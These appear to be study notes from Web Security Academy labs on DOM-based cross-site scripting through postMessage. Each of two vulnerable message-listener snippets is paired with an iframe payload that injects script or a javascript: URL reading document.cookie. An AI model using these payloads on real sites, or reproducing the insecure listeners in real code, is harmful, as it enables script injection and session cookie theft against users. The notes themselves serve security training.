window.addEventListener('message', function(e) {document.getElementById('ads').innerHTML = e.data;}) --> can be exploited with iframe
                    
<iframe src="https://your-lab-id.web-security-academy.net/" onload="this.contentWindow.postMessage('<img src=1 onerror=alert(document.cookie)>','*')"></iframe>


window.addEventListener('message', function(e) {
    var url = e.data;
    if (url.indexOf('http:') > -1 || url.indexOf('https:') > -1) {
        location.href = url;
    }
}, false); --> can be exploited with 
                    
<iframe src="https://ac091f481faa567380c80f8400a1002b.web-security-academy.net/" onload="this.contentWindow.postMessage('javascript: alert(document.cookie)//http:','*')"></iframe>


---
- contentWindow is the window of the iframe
